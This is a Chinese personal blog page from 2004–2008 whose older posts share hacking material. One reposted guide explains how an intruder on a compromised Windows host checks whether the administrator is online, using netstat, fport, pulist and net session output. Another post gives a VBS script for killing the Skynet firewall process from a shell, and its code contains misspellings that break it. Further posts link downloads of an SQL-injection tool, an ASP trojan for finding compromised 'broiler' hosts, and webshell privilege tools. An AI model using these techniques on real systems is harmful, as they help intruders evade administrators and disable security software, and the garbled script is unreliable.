Free sky
歪酷博客
日 历
网志文件夹
· 所有网志
· 技术文章
· 假装纯情随笔
· IT新闻
最 新 的 评 论
搜 索
友 情 链 接
· 歪酷博客
· 管理我的Blog
· my blog

订阅 RSS

0040572

歪酷博客

生活中有很多无奈,请尽量充实自己,充实生活,请善待生活。男人有很多无奈,生活很累,但是因为累,生活才有意义,当你以为你一无所有时,你至少还有时间,时间能抚平一切创伤,所以请不要流泪……
假装纯情 @ 2008-11-14 17:51

已经购买国外空间,原来站点所有数据,要转移到新的服务器上去,需要时间~~~一周内完成,给您造成的访问不便,十分抱歉~~~再次感谢您的支持~~~


 
假装纯情 @ 2008-10-02 00:08

本来想写的标题是“纪念”,结果顺手敲出来的字是“几年”,那就用几年吧~~~歪酷blog是我的第一个blog~~~也是最初让我知道blog是个什么东西的地方,像今天我的很多学生激动的跟我说,他有了一个个人blog一样,我当时申请了歪酷的blog也一样激动,当时还记得,应该是半夜的时候吧,呵呵,从高中开始我就一直是个夜猫子~~~
可惜当时不像现在,基本上每天都会写写涂涂的,要不然的话,看到这个blog还在,我会更激动。因为我所有的转折,所有的年轻的感动,都记录在2004年,我记得清清楚楚~~~如果那个时候我每天或者每个星期都写blog的话,我今天晚上会睡不着的,我会翻着每一篇写过的日志,回忆以前的年少轻狂~~~
不过我已经很开心和激动了~~~以后,我还会时不时的来更新日志,算是支持歪酷吧~~~当然也欢迎新老朋友光临我现在的小窝(http://www.am82.cn)~~~



 
假装纯情 @ 2004-11-12 18:11

如何判定管理员是否在线

转载:紫琦的Blog

如何判定管理员是否在线
  随着网络黑客工具的简单化和傻瓜化,越来越多的网络爱好者可以通过现成的攻击工具轻松的入侵主机,然而谁也不想在管理员的眼皮底下做入侵,所以在入侵成功以后,一个很重要的事情是:你能不能确认你的行为在别人的监视之下?所以我们首先要知道管理员是不是现在正在你入侵的主机上?
如何判定管理员在线,我们要知道的是管理员是通过什么方式管理主机的:是pcanywhere、vnc、DameWar、终端服务、ipc、telnet还是本地登陆···

一、对于用第三方的控屏工具(pcanywhere、vnc、DameWar等),你只要看相应端口有没有状态为"ESTABLISHED"的连接。一个netstat -an就可以知道,如果想查看与端口相关的进程,使用Fport.exe就可以了。比如我们在一台主机上使用netstat -an发现如下的信息:
Active Connections

Proto Local Address Foreign Address State

TCP lin:1755 lin:telnet ESTABLISHED
TCP lin:1756 lin:netbios-ssn ESTABLISHED
TCP lin:1758 202.103.243.105:http TIME_WAIT
TCP lin:1764 202.103.243.105:http TIME_WAIT
TCP lin:6129 lin:1751 ESTABLISHED

使用Fport.exe得到如下的信息:
Pid Process Port Proto Path

528 mysqld-nt -> 3306 TCP D:\mysql\bin\mysqld-nt.exe
1328 DWRCS -> 6129 TCP C:\WINNT\SYSTEM32\DWRCS.EXE ---这个是DameWare Mini Remote Control服务

8 System -> 138 UDP
248 lsass -> 500 UDP C:\WINNT\system32\lsass.exe


------从这个可以看出,管理员是通过DameWare Mini Remote Control来管理现在的主机,连接的端口是6129。同样如果管理员使用其他的控屏工具,比如pcanywhere、vnc我们也是可以通过netstat -an查看端口连接的情况。


  二、对于从本地或终端服务登陆的,看看有几个winlogon进程,我们可以使用的工具是PSTOOLS的PULIST.EXE,它能够查看本机的所用正在运行的进程。然后单凭有几个winlogon进程也很难判定在线的是不是管理员,因为一般用户和管理员都是通过图形界面登陆的,身份验证都是在GINA(GINA - Graphical Identification andAuthentication图形标识和身份验证)中进行,而GINA又和Winlogon进程紧密相关,所以查看有几个winlogon进程只能知道当前有几个用户登陆主机。这个办法也是给一个参考而已吧,给一个例子,这样应该好理解一点:
在主机上运行pulist.exe(至于如何才能在主机上运行pulist.exe,我想这个问题也不用说了吧),进程情况:
PID Path
0 [Idle Process]
8 [System]
160 \SystemRoot\System32\smss.exe
184 \??\C:\WINNT\system32\csrss.exe
208 \??\C:\WINNT\system32\winlogon.exe ----这个
680 C:\WINNT\System32\svchost.exe
404 C:\WINNT\Explorer.EXE
1088 \??\C:\WINNT\system32\csrss.exe
1084 \??\C:\WINNT\system32\winlogon.exe ----还有这个


在这个上面我们发现了有二个的winlogon.exe,就可以知道目前有2个用户通过本地或终端服务登陆主机,结合上面说的判定方法,使用netstat 查看TCP端口连接:

Num LocalIP Port RemoteIP PORT Status

10 192.168.0.1 3389 192.168.2.1 1071 Established ----终端的

可以看出使用的是终端3389连接。

  三、对于用telnet登陆的,telnet的登陆不是通过winlogon来管理的,还是看相应端口的连接吧,我们知道的是一般情况下telnet使用23端口连接,通过netstat -an可能很清楚的看出23端口有没有打开:
C:\>netstat -an

Active Connections

Proto Local Address Foreign Address State

TCP 127.0.0.1:23 127.0.0.1:1030 ESTABLISHED
TCP 127.0.0.1:1030 127.0.0.1:23 ESTABLISHED
我们也可以通过上面的方法查看相应的进程,比如我们使用FPORT.EXE是得到如下的信息:
E:\HACK>fport
FPort v2.0 - TCP/IP Process to Port Mapper
Copyright 2000 by Foundstone, Inc.
http://www.foundstone.com

Pid Process Port Proto Path
660 inetinfo -> 21 TCP C:\WINNT\System32\inetsrv\inetinfo.exe
1112 tlntsvr -> 23 TCP C:\WINNT\system32\tlntsvr.exe
660 inetinfo -> 80 TCP C:\WINNT\System32\inetsrv\inetinfo.exe
416 svchost -> 135 TCP C:\WINNT\system32\svchost.exe
660 inetinfo -> 443 TCP C:\WINNT\System32\inetsrv\inetinfo.exe
8 System -> 1028 TCP
408 telnet -> 1030 TCP C:\WINNT\system32\telnet.exe

从上面的信息可以知道23端口对应的正是telnet服务tlntsvr.exe。


  四、通过IPC$管道进行管理,这个可以通过WINDOWS NT系统内置的工具NET SESSION,它的作用是列出或断开连接本地计算机和与它连接的客户之间的会话。
下面给出一个结果:
E:\HACK>net session

计算机 用户名 客户类型 打开空闲时间

-------------------------------------------------------------------------------
\LIN LINYUN Windows 2000 2195 0 00:08:47

命令成功完成。

从这个上面我们就可以看出当前有一个用户名为LIYUN的用户登陆主机LIN。在这里给大家推荐一个比较好的工具——PSTOOLS里面的psloggedon.exe,它不仅能列出使用IPC$登陆的用户,而且能列出本地登陆的用户。
E:\Pstools\Pstools>psloggedon.exe

PsLoggedOn v1.21 - Logon Session Displayer
Copyright (C) 1999-2000 Mark Russinovich
SysInternals - www.sysinternals.com

Users logged on locally:
2003-9-15 14:33:38 LIN\Administrator -----这个是本地登陆的用户administrator

Users logged on via resource shares:
2003-9-15 14:41:04 LIN\LINYUN -----这个是使用IPC$连接的用户LINYUN

  如何判定管理员是否在线是一个比较深入的话题,上面说的仅仅是提供一个思路,当然了,如果管理员登陆了,却锁定了主机,或者正在运行屏幕保护程序,这一些就都不好说了!有矛必有盾,我们既然能通过各种的方式判定管理员是不是在线,同样,管理员也能通过这样的途径知道自己是否被入侵,从而尽快的查出入侵者,所以请广大的网络爱好者不要以身试法,入侵国内主机。

后记:由于本人的水平有限,关于这个话题的讨论可能有很多不周到的地方,还请各位朋友指点。


 
假装纯情 @ 2004-10-02 16:43

在轰轰烈烈的脚本入侵大潮中,你准备好了吗?
想想很早自己总是靠手,一句一句的输入语句,哎,再看看现在,真是没法比呀!
给大家介绍一款超级好用的工具,由54NB的小竹写的NBSI2.0
试试吧!
下载地址:
http://hackbase.com/down/view.asp?id=20041001nbsi2free.zip

转:黑客基地


 
假装纯情 @ 2004-10-01 23:43

写一个VBS脚本:
在SHELL里输入:
copy con kill.vbs (菜鸟注意:执行完这行之后就没有命令提示符了)
CODEstrComputer = "."
Set objWMIServive = GetObject("winmagmts:" _
& "{impersonationLevel=impcrsonatc}!\" &strComputer & "\root\cimv2"
Set colProcesslist = objWMIService.ExecQuery _
("select * from Win32 Process Where Name = 'PFWMain.exe'"
For Each objPrecess in colProcessList
objProcess.Terminate()
Next

'PFWMain'是天网的防火墙,你可以自行更改
输入完之后同时按下"CTRL"+"z",命令提示符就又出来了.
然后就是执行他了:
csript kill.vbs


 
假装纯情 @ 2004-10-01 23:36

现在网上asp木马很多用的海洋木马,本教程就是教你如何用海洋木马快速找肉鸡.
利用工具附包内。
作者:随爱飞翔   QQ:76112846
版权归黑客基地所有,转载请注明出处
下载地址:http://hackbase.com/down/view.asp?id=20030929hy.zip


 
假装纯情 @ 2004-09-08 11:33

相信有很多的朋友,得到webshell都苦恼于权限问题,在这里给大家介绍几款经典工具~(也留着自己以后用~HOHO~)

转 黑客基地~
下载:http://hackbase.com/down/file.asp?id=20040908webshel.zip